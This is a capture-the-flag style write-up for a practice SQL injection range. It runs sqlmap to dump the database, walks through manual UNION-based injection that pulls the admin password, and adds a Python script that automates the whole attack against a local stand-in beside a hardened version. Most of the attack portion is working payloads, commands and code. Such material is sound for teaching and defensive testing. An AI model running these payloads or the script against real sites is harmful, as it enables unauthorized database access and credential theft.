
SQL Injection Target Range (Catshed) Manual Injection

2024-10-13 11:50:53


Range address: /?id=1

Using Scripts

  • You could simply point sqlmap at the address and let it do all the work, but that is not much fun.
  • The command below uses sqlmapX from SqlmapXPlus, a secondary-development fork of sqlmap (the User-Agent list path in the log shows where it runs from); plain sqlmap takes exactly the same options. -D maoshe --dump dumps every table in the maoshe database, --batch accepts the default answer to every prompt, and --random-agent sends a randomly chosen User-Agent header.
sqlmapX -u "/?id=1" -D "maoshe" --dump --batch --random-agent
        ___
       __H__
 ___ ___["]_____ ___ ___ {1.8#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
      |_|V...       |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:46:16 /2024-10-12/

[20:46:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12' from file '/home/kali/tools/SqlmapXPlus/data/txt/'
[20:46:17] [INFO] resuming back-end DBMS 'mysql'
[20:46:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8425=8425

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 3539 FROM (SELECT(SLEEP(5)))tWAV)
---
[20:46:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[20:46:17] [INFO] fetching tables for database: 'maoshe'
[20:46:17] [INFO] fetching number of tables for database 'maoshe'
[20:46:17] [INFO] resumed: 4
[20:46:17] [INFO] resumed: admin
[20:46:17] [INFO] resumed: dirs
[20:46:17] [INFO] resumed: news
[20:46:17] [INFO] resumed: xss
[20:46:17] [INFO] fetching columns for table 'admin' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: Id
[20:46:17] [INFO] resumed: username
[20:46:17] [INFO] resumed: password
[20:46:17] [INFO] fetching entries for table 'admin' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'admin' in database 'maoshe'
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: 1
[20:46:17] [INFO] resumed: hellohack
[20:46:17] [INFO] resumed: admin
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: zkaqbanban
[20:46:17] [INFO] resumed: ppt
Database: maoshe
Table: admin
[2 entries]
+----+------------+----------+
| Id | password   | username |
+----+------------+----------+
| 1  | hellohack  | admin    |  ## the flag is found here: the admin password
| 2  | zkaqbanban | ppt      |
+----+------------+----------+

[20:46:17] [INFO] table 'maoshe.`admin`' dumped to CSV file '/home/kali/.local/share/sqlmap/output//dump/maoshe/'
[20:46:17] [INFO] fetching columns for table 'xss' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: id
[20:46:17] [INFO] resumed: user
[20:46:17] [INFO] resumed: pass
[20:46:17] [INFO] fetching entries for table 'xss' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'xss' in database 'maoshe'
[20:46:17] [INFO] resumed: 0
[20:46:17] [WARNING] table 'xss' in database 'maoshe' appears to be empty
Database: maoshe
Table: xss
[0 entries]
+----+------+--------+
| id | pass | user   |
+----+------+--------+
+----+------+--------+

[20:46:17] [INFO] table '' dumped to CSV file '/home/kali/.local/share/sqlmap/output//dump/maoshe/'
[20:46:17] [INFO] fetching columns for table 'news' in database 'maoshe'
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: id
[20:46:17] [INFO] resumed: content
[20:46:17] [INFO] fetching entries for table 'news' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'news' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: <div class="spacer"></div><div class="item"><div class="title">
[20:46:17] [INFO] resumed: 1
[20:46:17] [INFO] resumed: <h1>
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: <h1>
[20:46:17] [INFO] resumed: 3
Database: maoshe
Table: news
[3 entries]
+----+-----------------------------------------------------------------+
| id | content                                                         |
+----+-----------------------------------------------------------------+
| 1  | <div class="spacer"></div><div class="item"><div class="title"> |
| 2  | <h1>                                                            |
| 3  | <h1>                                                            |
+----+-----------------------------------------------------------------+

[20:46:18] [INFO] table '' dumped to CSV file '/home/kali/.local/share/sqlmap/output//dump/maoshe/'
[20:46:18] [INFO] fetching columns for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] resumed: 1
[20:46:18] [INFO] resumed: paths
[20:46:18] [INFO] fetching entries for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] fetching number of entries for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] resumed: 0
[20:46:18] [WARNING] table 'dirs' in database 'maoshe' appears to be empty
Database: maoshe
Table: dirs
[0 entries]
+-------+
| paths |
+-------+
+-------+

[20:46:18] [INFO] table '' dumped to CSV file '/home/kali/.local/share/sqlmap/output//dump/maoshe/'
[20:46:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/'

[*] ending @ 20:46:18 /2024-10-12/

Manual Injection

Determining if a SQL Injection Vulnerability Exists

  • Construct ?id=1 and 1=1. The added condition is always true, so the page renders exactly as it did for ?id=1; a normal page with no error is expected here.

  • Then construct ?id=1 and 1=2.
  • Now the page changes and the record is no longer shown. The parameter is spliced into the SQL statement unescaped and the injected condition reaches the database, which means there is an injection vulnerability.

Using the order by statement to determine the number of database fields

  • Construct ?id=1 and 1=1 order by 1: no change in the page (order by 1 sorts by the first selected column, ascending by default).
  • Then construct order by 2, order by 3, and so on, one at a time.
  • In MySQL an order by N with N larger than the number of columns in the select list fails with "Unknown column 'N' in 'order clause'", so the largest N that still renders the page normally is the number of columns the query returns.


  • order by 1 and order by 2 are fine, but order by 3 errors, so the query selects two columns.

Using a Union Query to Determine the Return Point

  • A return point (echo position) is a spot on the page where a value from the database is displayed, for example the view count or publish date shown on an article page; those fields are rendered straight from the query result, so whatever we put into that column of the result is shown too.
  • The page only renders the first row of the result set. While the original condition ?id=1 still matches, that row occupies the display and the row appended by union select 1,2 never appears, so the original query has to return nothing first.
  • So make the original condition false, ?id=1 and 1=2, and append the usual union select 1,2. The number that now appears in the page marks the return point; here it is 2.

Querying related data using a return point

  1. Query the name of the current database
  • Since column 2 is the return point, replace the 2 in the union query with whatever expression we want displayed.
  • To get the current database name, replace 2 with database().
  • Construct ?id=1 and 1=2 union select 1,database()
  • The database name is maoshe.
  2. Query the table names in the database
  • Construct ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
  • limit 0,1 means skip 0 rows and return one row, i.e. the first table name.

  • Change the trailing limit to limit 1,1, limit 2,1 and so on to read the following table names one at a time.
  • The tables in the database are admin, dirs, news, xss.
  • With limit 4,1 the return point is blank, so there are only four tables; the administrator's account is usually in admin.
  3. Query the column names of the admin table
  • Construct ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
  • Stepping the limit in the same way gives the columns in order: the first is id, the second is username, the third is password.
  • All the structure is now known, so the data can be read directly.
  4. Read the required information
  • Construct ?id=1 and 1=2 union select 1,username from admin
  • Construct ?id=1 and 1=2 union select 1,password from admin where username = 'admin'
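The whole manual procedure above (the and 1=1 / and 1=2 check, counting columns with order by, finding the return point with union select, stepping limit n,1 through the metadata tables, and finally reading the admin row) replayed in Python against a constructed SQLite stand-in for the vulnerable page, so it runs offline. This is an added example, not code from the original post or from the range. The admin rows are taken from the sqlmap dump above; the news rows, the render() helper, the two page functions and all probe names are assumptions. sqlite_master and pragma_table_info() stand in for MySQL's information_schema.tables and information_schema.columns. A hardened safe_page() is included to show the same probes failing once the parameter is type-checked and bound instead of concatenated.

```python
import re
import sqlite3

def build_db():
    """Constructed SQLite stand-in for 'maoshe': admin rows match the dump, news rows are made up."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, content TEXT);
        CREATE TABLE admin(Id INTEGER, username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'first post'), (2, 'second post');
        INSERT INTO admin VALUES (1, 'admin', 'hellohack'), (2, 'ppt', 'zkaqbanban');
    """)
    return db

def render(row):
    # Only the second selected column (content) is echoed into the HTML; the id
    # column never is, which is why position 2 is the page's return point.
    return '<div class="title">%s</div>' % row[1]

def vulnerable_page(db, id_param):
    """Stand-in for the range's PHP: ?id= is spliced into the SQL string unescaped
    and only the first row of the result set is rendered."""
    sql = "SELECT id, content FROM news WHERE id=" + id_param
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return ""                      # SQL error (e.g. order by 3): broken page
    return render(row) if row else ""  # WHERE matched nothing: blank page

def safe_page(db, id_param):
    """Hardened form: type-check the parameter and bind it, never concatenate it."""
    try:
        id_val = int(id_param)
    except ValueError:
        return ""
    row = db.execute("SELECT id, content FROM news WHERE id=?", (id_val,)).fetchone()
    return render(row) if row else ""

def is_injectable(page):
    """Step 1: 'and 1=1' must leave the page unchanged, 'and 1=2' must change it."""
    base = page("1")
    return base != "" and page("1 and 1=1") == base and page("1 and 1=2") != base

def count_columns(page, max_cols=32):
    """Step 2: 'order by N' breaks the page once N exceeds the select list."""
    base = page("1")
    for n in range(1, max_cols + 1):
        if page("1 and 1=1 order by %d" % n) != base:
            return n - 1
    return None

def union_payload(ncols, echo, expr, tail=""):
    # 'and 1=2' empties the original result so the UNION row is the one rendered;
    # every column is a placeholder number except the echoed one.
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[echo - 1] = expr
    return "1 and 1=2 union select " + ",".join(cols) + (" " + tail if tail else "")

def find_echo_points(page, ncols):
    """Step 3: union a row of distinct markers and see which one is echoed."""
    markers = [str(90000 + i) for i in range(1, ncols + 1)]
    html = page("1 and 1=2 union select " + ",".join(markers))
    return [i + 1 for i, m in enumerate(markers) if m in html]

def read_one(page, ncols, echo, expr, tail=""):
    """Step 4: show an arbitrary expression through the return point; None if blank."""
    m = re.search(r'<div class="title">(.*?)</div>', page(union_payload(ncols, echo, expr, tail)), re.S)
    return m.group(1) if m else None

def read_all(page, ncols, echo, expr, from_where, max_rows=64):
    """The post's 'limit 0,1 / limit 1,1 / ...' loop: step the offset until the echo is blank."""
    rows = []
    for i in range(max_rows):
        v = read_one(page, ncols, echo, expr, "%s limit %d,1" % (from_where, i))
        if v is None:
            break
        rows.append(v)
    return rows

def run_attack(db):
    """Whole procedure against the vulnerable page; the two metadata sources are
    the SQLite equivalents of information_schema.tables / .columns (assumed)."""
    page = lambda p: vulnerable_page(db, p)
    ncols = count_columns(page) if is_injectable(page) else None
    if not ncols:
        return None
    echo = find_echo_points(page, ncols)[0]
    return {
        "columns": ncols,
        "echo": echo,
        "tables": read_all(page, ncols, echo, "name", "from sqlite_master where type='table'"),
        "admin_columns": read_all(page, ncols, echo, "name", "from pragma_table_info('admin')"),
        "admin_password": read_one(page, ncols, echo, "password", "from admin where username='admin'"),
    }

if __name__ == "__main__":
    db = build_db()
    print(run_attack(db))
    print("hardened page injectable:", is_injectable(lambda p: safe_page(db, p)))
```

Against the real range the only changes are replacing vulnerable_page with an HTTP GET of /?id=<payload> and swapping the two from_where strings back to from information_schema.tables where table_schema=database() and from information_schema.columns where table_schema=database() and table_name='admin'. Because UNION deduplicates and may reorder rows, the limit n,1 loop returns the tables in whatever order the engine settles on, so compare the list as a set rather than by position.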

Conclusion

  • Flag obtained: the administrator's password is hellohack.